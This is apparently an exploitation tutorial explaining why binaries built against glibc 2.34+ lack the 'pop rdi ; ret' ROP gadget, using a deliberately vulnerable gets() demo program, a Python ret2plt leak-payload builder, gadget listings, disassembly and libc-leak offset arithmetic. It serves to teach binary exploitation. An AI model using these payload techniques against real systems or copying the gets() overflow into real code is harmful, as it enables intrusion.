The problem
What happened to ROP?
Ah, the classic overflow challenge. By now most people are familiar with this style of exploit: you have a buffer on the stack, and you can write more data into it than was allocated, overflowing into whatever sits above it. And because it's so well known, so are the techniques for exploiting it. Take the simple program below.
// gcc demo.c -o demo -no-pie -fno-stack-protector
#include <stdio.h>
int main() {
    char buf[0x20];
    puts("ROP me if you can!");
    gets(buf);
}
It's obvious that we can overflow the buf buffer, so from here we'd typically use the classic ret2plt attack, where we:
Use puts to leak a GOT entry
Return to main
Call system("/bin/sh")
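The first two steps above boil down to a single first-stage payload. Here is a minimal sketch of how it could be laid out, using only Python's struct module. The puts@plt and main addresses are the ones pwndbg reports for the demo binary further down this page; POP_RDI and PUTS_GOT are placeholder values, and the 0x28 offset assumes buf sits directly below the saved rbp, which is worth confirming in a debugger.

```python
import struct

# Addresses from the demo binary's symbol listing (no PIE, so they are fixed).
PUTS_PLT = 0x401030
MAIN = 0x401136

# Placeholders (assumptions): substitute the real values for your binary.
POP_RDI = 0x4011D3   # hypothetical address of a "pop rdi ; ret" gadget
PUTS_GOT = 0x404018  # hypothetical address of puts' GOT entry

# Assumed layout: 0x20 bytes of buf followed by 8 bytes of saved rbp.
OFFSET = 0x20 + 8


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


def build_leak_payload() -> bytes:
    """Stage 1: call puts(puts@got), then return to main for a second overflow."""
    chain = [POP_RDI, PUTS_GOT, PUTS_PLT, MAIN]
    payload = b"A" * OFFSET + b"".join(p64(word) for word in chain)
    # gets() stops reading at a newline, so the payload must not contain one.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte; gets() would truncate it")
    return payload


payload = build_leak_payload()
print(payload.hex())
```

The whole chain hinges on POP_RDI, since that gadget is what loads the first argument for puts.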
First we're going to need to find the pop rdi ; ret gadget, so let's run ROPgadget.
$ ROPgadget --binary demo
Gadgets information
============================================================
0x00000000004010ab : add bh, bh ; loopne 0x401115 ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040115f : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x0000000000401078 : add byte ptr [rax], al ; add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x0000000000401160 : add byte ptr [rax], al ; add cl, cl ; ret
0x000000000040111a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401039 : add byte ptr [rax], al ; jmp 0x401020
0x0000000000401161 : add byte ptr [rax], al ; leave ; ret
0x000000000040107a : add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x0000000000401034 : add byte ptr [rax], al ; push 0 ; jmp 0x401020
0x0000000000401044 : add byte ptr [rax], al ; push 1 ; jmp 0x401020
0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401012 ; call rax
0x000000000040111b : add byte ptr [rcx], al ; pop rbp ; ret
0x0000000000401162 : add cl, cl ; ret
0x00000000004010aa : add dil, dil ; loopne 0x401115 ; nop ; ret
0x0000000000401047 : add dword ptr [rax], eax ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040111c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401117 : add eax, 0x2f03 ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401118 : add ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401013 : add esp, 8 ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x00000000004010a8 : and byte ptr [rax + 0x40], al ; add bh, bh ; loopne 0x401115 ; nop ; ret
0x0000000000401010 : call rax
0x0000000000401133 : cli ; jmp 0x4010c0
0x0000000000401130 : endbr64 ; jmp 0x4010c0
0x000000000040100e : je 0x401012 ; call rax
0x00000000004010a5 : je 0x4010b0 ; mov edi, 0x404020 ; jmp rax
0x00000000004010e7 : je 0x4010f0 ; mov edi, 0x404020 ; jmp rax
0x000000000040103b : jmp 0x401020
0x0000000000401134 : jmp 0x4010c0
0x00000000004010ac : jmp rax
0x0000000000401163 : leave ; ret
0x00000000004010ad : loopne 0x401115 ; nop ; ret
0x0000000000401116 : mov byte ptr [rip + 0x2f03], 1 ; pop rbp ; ret
0x000000000040115e : mov eax, 0 ; leave ; ret
0x00000000004010a7 : mov edi, 0x404020 ; jmp rax
0x00000000004010af : nop ; ret
0x000000000040112c : nop dword ptr [rax] ; endbr64 ; jmp 0x4010c0
0x000000000040107c : nop dword ptr [rax] ; ret
0x00000000004010a6 : or dword ptr [rdi + 0x404020], edi ; jmp rax
0x000000000040111d : pop rbp ; ret
0x0000000000401036 : push 0 ; jmp 0x401020
0x0000000000401046 : push 1 ; jmp 0x401020
0x0000000000401016 : ret
0x0000000000401042 : ret 0x2f
0x0000000000401022 : retf 0x2f
0x000000000040100d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x0000000000401169 : sub esp, 8 ; add rsp, 8 ; ret
0x0000000000401168 : sub rsp, 8 ; add rsp, 8 ; ret
0x000000000040100c : test eax, eax ; je 0x401012 ; call rax
0x00000000004010a3 : test eax, eax ; je 0x4010b0 ; mov edi, 0x404020 ; jmp rax
0x00000000004010e5 : test eax, eax ; je 0x4010f0 ; mov edi, 0x404020 ; jmp rax
0x000000000040100b : test rax, rax ; je 0x401012 ; call rax
Unique gadgets found: 53
Wait a second. Where's pop rdi ; ret? It should be here somewhere, right? Well, actually, a lot of the usual gadgets are missing, such as:
pop rdi ; ret
pop rsi ; pop r15 ; ret
pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
So what's going on? Let's investigate, shall we?
Where does pop rdi ; ret come from?
Where did it come from, and where did it go? Where did it come from, Cotton Eye Joe?
To find out, let's take an unstripped binary which has this gadget. There are plenty to choose from across countless CTFs, so I chose hackthebox's ropme. Running ROPgadget on it:
$ ROPgadget --binary ropme
Gadgets information
============================================================
...
0x00000000004006d3 : pop rdi ; ret
...
Let's see where this lies in the binary.
pwndbg> x/2i 0x00000000004006d3
0x4006d3 <__libc_csu_init+99>: pop rdi
0x4006d4 <__libc_csu_init+100>: ret
So it seems our beloved gadget belongs to a function called __libc_csu_init.
pwndbg> disassemble __libc_csu_init
Dump of assembler code for function __libc_csu_init:
0x0000000000400670 <+0>: push r15
0x0000000000400672 <+2>: push r14
0x0000000000400674 <+4>: mov r15d,edi
0x0000000000400677 <+7>: push r13
0x0000000000400679 <+9>: push r12
0x000000000040067b <+11>: lea r12,[rip+0x20078e] # 0x600e10
0x0000000000400682 <+18>: push rbp
0x0000000000400683 <+19>: lea rbp,[rip+0x20078e] # 0x600e18
0x000000000040068a <+26>: push rbx
0x000000000040068b <+27>: mov r14,rsi
0x000000000040068e <+30>: mov r13,rdx
0x0000000000400691 <+33>: sub rbp,r12
0x0000000000400694 <+36>: sub rsp,0x8
0x0000000000400698 <+40>: sar rbp,0x3
0x000000000040069c <+44>: call 0x4004b0 <_init>
0x00000000004006a1 <+49>: test rbp,rbp
0x00000000004006a4 <+52>: je 0x4006c6 <__libc_csu_init+86>
0x00000000004006a6 <+54>: xor ebx,ebx
0x00000000004006a8 <+56>: nop DWORD PTR [rax+rax*1+0x0]
0x00000000004006b0 <+64>: mov rdx,r13
0x00000000004006b3 <+67>: mov rsi,r14
0x00000000004006b6 <+70>: mov edi,r15d
0x00000000004006b9 <+73>: call QWORD PTR [r12+rbx*8]
0x00000000004006bd <+77>: add rbx,0x1
0x00000000004006c1 <+81>: cmp rbx,rbp
0x00000000004006c4 <+84>: jne 0x4006b0 <__libc_csu_init+64>
0x00000000004006c6 <+86>: add rsp,0x8
0x00000000004006ca <+90>: pop rbx
0x00000000004006cb <+91>: pop rbp
0x00000000004006cc <+92>: pop r12
0x00000000004006ce <+94>: pop r13
0x00000000004006d0 <+96>: pop r14
0x00000000004006d2 <+98>: pop r15
0x00000000004006d4 <+100>: ret
End of assembler dump.
Interestingly, the function's disassembly doesn't seem to contain pop rdi ; ret. That's because pop rdi ; ret doesn't show up in the regular code, but rather comes from splitting an instruction in half, specifically pop r15. You may have noticed that the disassembly lists __libc_csu_init+98 and __libc_csu_init+100, but pop rdi ; ret is at __libc_csu_init+99.
Quirk of x86
pop r15 ; ret = 41 5f c3
                   ~~~~~
pop rdi ; ret =    5f c3
                   ~~~~~
The above is how these instructions get assembled. Notice that pop r15 ; ret is one byte longer, but its last 2 bytes are the same as pop rdi ; ret. That's because the leading 41 is a REX prefix: it extends the register field of the pop opcode 5f, turning pop rdi into pop r15. Because x86 instructions are variable-length, unlike ARM's fixed-length instructions, execution can start at any byte. So we can take the address of pop r15 ; ret, increment it by 1, and get pop rdi ; ret.
pwndbg> x/2i 0x00000000004006d2
0x4006d2 <__libc_csu_init+98>: pop r15
0x4006d4 <__libc_csu_init+100>: ret
pwndbg> x/2i 0x00000000004006d2+1
0x4006d3 <__libc_csu_init+99>: pop rdi
0x4006d4 <__libc_csu_init+100>: ret
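To make the encoding quirk concrete, here is a small sketch that assembles pop for any 64-bit general-purpose register by hand. The helper name encode_pop is made up for this illustration; the encoding itself is the standard one, opcode 0x58 plus the low three bits of the register number, with a 0x41 prefix for r8 to r15.

```python
# Register numbers used by the x86-64 "pop r64" encoding (opcode 0x58 + low 3 bits).
REGISTERS = [
    "rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
]

RET = b"\xc3"


def encode_pop(reg: str) -> bytes:
    """Assemble "pop <reg>" for a 64-bit general-purpose register."""
    number = REGISTERS.index(reg)
    opcode = bytes([0x58 + (number & 7)])
    # Registers r8-r15 need a REX prefix with the B bit set (0x41).
    return (b"\x41" if number >= 8 else b"") + opcode


# Skipping the one-byte prefix of "pop r8..r15" leaves a pop of a legacy register.
for high in REGISTERS[8:]:
    low = REGISTERS[REGISTERS.index(high) - 8]
    assert encode_pop(high)[1:] == encode_pop(low)
    print(f"pop {high} ; ret = {(encode_pop(high) + RET).hex(' ')}  ->  +1: pop {low} ; ret")
```

The same trick explains the other familiar gadgets: skipping the prefix of pop r14 gives pop rsi, which is where pop rsi ; pop r15 ; ret comes from.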
So wherever there is a pop r15, there will also be pop rdi. And since __libc_csu_init will always contain pop r15 ; ret, binaries with __libc_csu_init will have pop rdi ; ret!
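This is essentially what a gadget finder does: it searches for byte patterns at every offset, not just at instruction boundaries. Below is a rough sketch of that idea applied to the epilogue of __libc_csu_init. The bytes are reconstructed from the ropme disassembly above using the standard encodings rather than dumped from the file, and find_gadget is a hypothetical helper, not part of ROPgadget.

```python
from typing import List

# Epilogue of __libc_csu_init from the ropme disassembly, starting at 0x4006ca:
# pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
EPILOGUE_BASE = 0x4006CA
EPILOGUE = bytes.fromhex("5b 5d 41 5c 41 5d 41 5e 41 5f c3")


def find_gadget(code: bytes, base: int, pattern: bytes) -> List[int]:
    """Return the address of every occurrence of pattern, at any byte offset."""
    hits = []
    start = code.find(pattern)
    while start != -1:
        hits.append(base + start)
        start = code.find(pattern, start + 1)
    return hits


pop_rdi = find_gadget(EPILOGUE, EPILOGUE_BASE, bytes.fromhex("5f c3"))
pop_rsi_r15 = find_gadget(EPILOGUE, EPILOGUE_BASE, bytes.fromhex("5e 41 5f c3"))
print([hex(addr) for addr in pop_rdi])      # pop rdi ; ret
print([hex(addr) for addr in pop_rsi_r15])  # pop rsi ; pop r15 ; ret
```

The first search lands on 0x4006d3, the same address ROPgadget reported for pop rdi ; ret in ropme.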
Where did pop rdi ; ret go?
So if any binary containing __libc_csu_init has the pop rdi gadget, what's happening in the demo binary?
pwndbg> info functions
All defined functions:
Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 puts@plt
0x0000000000401040 gets@plt
0x0000000000401050 _start
0x0000000000401080 _dl_relocate_static_pie
0x0000000000401090 deregister_tm_clones
0x00000000004010c0 register_tm_clones
0x0000000000401100 __do_global_dtors_aux
0x0000000000401130 frame_dummy
0x0000000000401136 main
0x0000000000401168 _fini
Aha! In the demo binary, __libc_csu_init is not present! But why is that?
Well, glibc 2.34 included a patch which stopped __libc_csu_init from being compiled into binaries. The patch was designed to remove useful ROP gadgets for ret2csu, and has the effect of removing pop rdi ; ret from binaries compiled against glibc 2.34+.
Side note on __libc_start_main
This changed a few things, such as __libc_start_main, which took __libc_csu_init as an argument and was expected to run it. Now that __libc_csu_init doesn't exist, __libc_start_main still takes the argument but does nothing with it. Because its behaviour changed, it had to be given a new symbol version for 2.34. This means that you can't run binaries compiled against glibc 2.34+ on older glibc versions, otherwise you'd get the very annoying error:
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found
So you have this patch to thank for this :)
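If you want a quick guess at which kind of binary you're looking at before reaching for ROPgadget, a crude string search can help. The sketch below is only a heuristic with a made-up helper name: it assumes the symbol name survives in unstripped binaries, and that a dynamically linked binary built against glibc 2.34+ carries the GLIBC_2.34 version string seen in the error above. The two sample blobs are synthetic stand-ins, not real binaries.

```python
def scan_startup_markers(elf_bytes: bytes) -> dict:
    """Look for two telltale NUL-terminated strings in a raw ELF image."""
    return {
        # Symbol name kept by unstripped binaries linked against older glibc.
        "has_csu_init_symbol": b"__libc_csu_init\x00" in elf_bytes,
        # Version string referenced by binaries linked against glibc 2.34+.
        "needs_glibc_2_34": b"GLIBC_2.34\x00" in elf_bytes,
    }


# Synthetic stand-ins for string tables, just to exercise the check.
old_style = b"\x00puts\x00__libc_csu_init\x00GLIBC_2.2.5\x00"
new_style = b"\x00puts\x00__libc_start_main\x00GLIBC_2.2.5\x00GLIBC_2.34\x00"

print(scan_startup_markers(old_style))
print(scan_startup_markers(new_style))
```

For a real file, pass in the bytes read from it in binary mode. A stripped older binary will report no symbol even though the function and its gadgets are still there, so treat a negative result with suspicion.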
Sooo what now?
So has this completely killed ROP on modern binaries? Has our time spent practising and mastering the art of ROP all been for nothing, and we'll have to move on to other types of exploits entirely?
Woah, slow down. I want to argue that it hasn't. While it has thrown a wrench into how we do ROP, there are still tricks we can use to get around this, which I will showcase in the following sections.
Other sources of pop rdi ; ret
For one thing, __libc_csu_init isn't our only source of pop rdi ; ret. Recall that wherever there's pop r15 ; ret there is pop rdi ; ret. But why does pop r15 ; ret show up in __libc_csu_init?
Well, normally when we compile without optimization, the variables in a function are stored on the stack. But if we compile with optimization flags (or use register when defining a variable), some variables can be kept in registers instead. The registers typically used include rbp, r12, r13, r14, r15 and rbx. For this to work, a function using these registers must save their old values before using them, and then restore them when returning. This is because the caller may also be using these registers, and would otherwise have its values clobbered. So the function pushes them to the stack at the start, then pops them at the end. If you look back at __libc_csu_init's disassembly above, it follows this same pattern, because it's compiled with optimization.
This means that if your binary is compiled with optimization, there is a chance r15 is used for a variable, meaning it must also be pushed, and more importantly popped, which would result in pop r15 -> pop rdi.
This is why glibc will always contain pop rdi: it's compiled with optimization, and there are so many functions with lots of variables stored in registers that it's basically guaranteed that r15 is used in at least one of them.
This means that once you have a libc leak, you'll always be able to find a pop rdi ; ret gadget. However, if all you have is an overflow, and no leak, then this will still cause problems.
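Once a leak is available, turning it into a gadget address is just arithmetic: subtract the leaked function's offset to get the libc base, then add the gadget's offset. A minimal sketch follows, assuming the leak is the address of puts printed by puts itself. Both offsets are hypothetical and differ between libc builds, so look them up in the exact libc the target uses.

```python
import struct

# Hypothetical offsets inside one particular libc build (assumptions).
PUTS_OFFSET = 0x80E50
POP_RDI_OFFSET = 0x2A3E5


def parse_leak(raw: bytes) -> int:
    """Turn the bytes printed by puts(puts@got) into a 64-bit address."""
    # Drop the single newline puts appends, then pad back up to 8 bytes,
    # because puts stops printing at the first NUL byte.
    if raw.endswith(b"\n"):
        raw = raw[:-1]
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]


def pop_rdi_in_libc(leaked_puts: int) -> int:
    """Compute the runtime address of a libc "pop rdi ; ret" gadget."""
    base = leaked_puts - PUTS_OFFSET
    # A libc base that is not page-aligned means the offsets are wrong.
    if base & 0xFFF:
        raise ValueError(f"suspicious libc base {base:#x}; wrong libc version?")
    return base + POP_RDI_OFFSET


# Simulated leak: six address bytes followed by the newline from puts.
sample = struct.pack("<Q", 0x7FFFF7C00000 + PUTS_OFFSET)[:6] + b"\n"
leak = parse_leak(sample)
print(hex(leak), hex(pop_rdi_in_libc(leak)))
```

The page-alignment check is a cheap sanity test: if the base doesn't end in 000, the offsets almost certainly belong to a different libc.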
Summary
So if your binary doesn't have pop rdi ; ret, then you have a few approaches:
Get a libc leak using a different bug
Control rdi some other way
Use the overflow to leak libc
In the following sections, I'll show some tricks you can use for the latter two approaches :)